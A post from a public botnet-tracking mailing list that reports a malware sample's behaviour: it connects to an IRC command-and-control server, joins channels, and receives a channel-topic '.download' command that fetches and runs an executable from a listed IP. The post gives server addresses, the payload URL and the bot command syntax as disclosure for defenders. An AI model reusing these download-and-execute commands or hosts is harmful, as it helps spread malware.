Started seeing this last week. Low detects on VirusTotal. No surprise there. /dean
Target Address: 67.43.158.42 Target Country: United States Target Host Name: Target Port: 7000 Transport Protocol: TCP Server appears to be in Murrieta, CA 92562 COORDS: 117deg 20'20" W by 33deg 32'33" N * Disconnected (). * Looking up 67.43.158.42 * Connecting to 67.43.158.42 (67.43.158.42) port 7000... * Connected. Now logging in... * Disconnected (Connection reset by peer). Cycling to next server in test... * Disconnected (). * Looking up 67.43.158.42 * Connecting to 67.43.158.42 (67.43.158.42) port 7000... * Connected. Now logging in... * Cisco * gwpzekmw sets mode +i gwpzekmw Appears to disconnect the user attempting to join multiple times and eventually allows the bot to join. On join the bot is joined to #1 and #usb. The chan with the command is in #usb. Topic is set to: .download h t t p://67.43.158.44/cepi.exe cepi.exe 1 %1 = command: .download %2 = URL: h t t p://67.43.158.44/cepi.exe %3 = file: cepi.exe %4 = additional param: 1 <-- to execute as a process? [Download]: File download: 1094.1KB to: cepi.exe @ 182.3KB/sec. [Download]: Failed to create process: "cepi.exe"‚ error: <267> _______________________________________________ botnets@, the public's dumping ground for maliciousness All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
